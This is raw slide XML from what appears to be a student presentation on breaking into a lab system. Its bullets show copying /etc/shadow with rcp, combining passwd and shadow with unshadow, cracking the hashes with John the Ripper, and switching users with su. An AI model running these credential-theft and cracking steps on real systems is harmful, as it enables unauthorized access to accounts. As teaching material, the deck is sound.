              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All password hashes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Shape 200"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="56503"/>
            <a:ext cx="8229600" cy="857400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Breaking In: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>rcp </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="3000"/>
              <a:t>to grab </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>/etc/shadow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="201" name="Shape 201"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4871726" y="913896"/>
            <a:ext cx="3583799" cy="4298203"/>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x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="Shape 206"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="913900"/>
            <a:ext cx="7999500" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>unshadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>combines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>into a list that the John the Ripper hash-cracker can work with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>unshadow passwd shadow &gt; ~/file_to_crack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use John’s built-in password list, or our own</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>/usr/share/john/password.list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Don’t have to use a wordlist</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="Shape 207"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="56503"/>
            <a:ext cx="8229600" cy="857400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Breaking In: Unhashing the Passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="208" name="Shape 208"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524375" y="3318550"/>
            <a:ext cx="5657850" cy="381000"/>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2" name="Shape 212"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Shape 213"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="913900"/>
            <a:ext cx="4375200" cy="4022699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JTR syntax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>john --wordlist=[wordlist] [hash file]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>-- show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shows uncrackable hashes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Shape 214"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="56503"/>
            <a:ext cx="8229600" cy="857400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Breaking In: John’s List</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="215" name="Shape 215"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5562630" y="0"/>
            <a:ext cx="3496840" cy="5143500"/>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 name="Shape 41"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Shape 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1583342"/>
            <a:ext cx="7772400" cy="1159799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>NMap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Shape 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2840053"/>
            <a:ext cx="7772400" cy="784799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Handsome Seastars</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txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="913900"/>
            <a:ext cx="7999500" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Shape 221"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="56503"/>
            <a:ext cx="8229600" cy="857400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Breaking In: Unhashing the Passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="222" name="Shape 222"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="380250" y="800100"/>
            <a:ext cx="8153400" cy="3839500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>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sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Shape 227"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="913900"/>
            <a:ext cx="7999500" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>su - [username]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Consolas"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>was breached; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>sys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>didn’t even ask for password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Shape 228"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="56503"/>
            <a:ext cx="8229600" cy="857400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Breaking In: Impersonating Other Users</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sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Shape 233"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="913900"/>
            <a:ext cx="7999500" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Single crack mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tries regular + garbled login names, full names, home directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incremental</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tries all possible char combinations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wordlist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uses pre-defined wordlist (rainbow table)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="Shape 234"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="56503"/>
            <a:ext cx="8229600" cy="857400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Breaking In: John without wordlist</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 name="Shape 238"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Shape 239"/>
          <p:cNvSpPr txBox="1"/>
